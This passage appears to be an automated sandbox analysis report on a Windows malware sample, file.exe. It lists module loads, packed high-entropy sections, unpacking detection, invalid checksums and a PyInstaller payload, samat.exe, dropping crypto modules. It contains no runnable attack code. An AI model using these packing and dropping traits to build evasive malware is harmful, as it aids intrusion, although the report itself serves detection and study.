Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1927680 > 1048576
Source: file.exe Static PE information: Raw size of fjmpujlc is bigger than: 0x100000 < 0x1a4c00
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4574676544.00007FF8B8327000.00000002.00000001.01000000.0000001E.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb** source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: samat.exe, 00000008.00000002.4568570169.00007FF8A8792000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987011870.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4588139749.00007FF8BFB14000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: samat.exe, 00000008.00000002.4568570169.00007FF8A882A000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb!! source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585287094.00007FF8B9843000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: samat.exe, 00000008.00000002.4587381995.00007FF8BFAC3000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\pywintypes.pdb source: samat.exe, 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585606922.00007FF8B9F66000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: samat.exe, 00000008.00000002.4583959875.00007FF8B9162000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4585930207.00007FF8B9F73000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\a\pywin32\pywin32\build\temp.win-amd64-cpython-313\Release\win32crypt.pdb source: samat.exe, 00000008.00000002.4572761166.00007FF8B7EC2000.00000002.00000001.01000000.00000031.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584509371.00007FF8B919B000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586952230.00007FF8BA51D000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586592016.00007FF8BA504000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4584962997.00007FF8B93C9000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: samat.exe, 00000008.00000002.4582141897.00007FF8B90FF000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: samat.exe, 00000008.00000002.4569745344.00007FF8A8CF8000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: samat.exe, 00000007.00000003.2987209081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4586255750.00007FF8BA4F5000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: samat.exe, 00000008.00000002.4575346345.00007FF8B83B5000.00000002.00000001.01000000.00000019.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: samat.exe, 00000008.00000002.4582488584.00007FF8B911E000.00000002.00000001.01000000.00000018.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 3.2.skotes.exe.7a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fjmpujlc:EW;jlhbczjq:EW;.taggant:EW;
Binary contains a suspicious time stamp
Source: VCRUNTIME140.dll.7.dr Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8DE80 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree, 8_2_00007FF8B7E8DE80
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: _ghash_clmul.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xac61
Source: _pkcs1_decode.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x10c34
Source: _raw_eksblowfish.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xca96
Source: _chacha20.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x351a
Source: _SHA384.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1655d
Source: _raw_cast.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xc443
Source: md.cp313-win_amd64.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x47a9
Source: _modexp.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x172cd
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1da666 should be: 0x1e3c3d
Source: _SHA256.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x6eb8
Source: _cffi_backend.cp313-win_amd64.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x2f4d9
Source: _raw_ecb.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x4671
Source: _BLAKE2s.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x5f6b
Source: _cpuid_c.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xdccc
Source: _SHA1.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xf079
Source: _SHA224.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1037a
Source: _MD2.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xeba3
Source: _scrypt.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x4714
Source: _raw_des3.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1d746
Source: _RIPEMD160.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x69e1
Source: _raw_ctr.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xdcf9
Source: _ec_ws.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xbf2b1
Source: pywintypes313.dll.7.dr Static PE information: real checksum: 0x0 should be: 0x21b11
Source: _keccak.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xdc9d
Source: file.exe Static PE information: real checksum: 0x1da666 should be: 0x1e3c3d
Source: _Salsa20.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xb9f9
Source: _raw_arc2.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x13220
Source: _curve448.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1a70d
Source: _ARC4.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x9b3a
Source: _raw_aes.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xbec9
Source: _MD4.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x9e2d
Source: _strxor.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x48ff
Source: _ghash_portable.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xe5b7
Source: _raw_cfb.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xed0d
Source: md__mypyc.cp313-win_amd64.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1ee46
Source: _curve25519.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1023e
Source: _poly1305.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xbf54
Source: _ed25519.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x10701
Source: _BLAKE2b.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x120c3
Source: _SHA512.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xdf25
Source: _MD5.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xa544
Source: _raw_aesni.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x646e
Source: win32crypt.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x22ce5
Source: _ed448.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x1eae6
Source: _raw_des.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x13f62
Source: _raw_ofb.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x10ea2
Source: _raw_blowfish.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0xe4b7
Source: _raw_ocb.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x11289
Source: _raw_cbc.pyd.7.dr Static PE information: real checksum: 0x0 should be: 0x5ba2
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: fjmpujlc
Source: file.exe Static PE information: section name: jlhbczjq
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: fjmpujlc
Source: skotes.exe.0.dr Static PE information: section name: jlhbczjq
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: VCRUNTIME140.dll.7.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.7.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.7.dr Static PE information: section name: .00cfg
Source: libssl-3.dll.7.dr Static PE information: section name: .00cfg
Source: python313.dll.7.dr Static PE information: section name: PyRuntim
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B802267D push rbx; retf 8_2_00007FF8B8022685
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B80227AE push rsp; iretd 8_2_00007FF8B80227B9
Source: file.exe Static PE information: section name: entropy: 7.982732781787212
Source: file.exe Static PE information: section name: fjmpujlc entropy: 7.954406052797792
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.982732781787212
Source: skotes.exe.0.dr Static PE information: section name: fjmpujlc entropy: 7.954406052797792

Persistence and Installation Behavior
barindex
Found pyInstaller with non standard icon
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\python313.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File created: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pyd Jump to dropped file
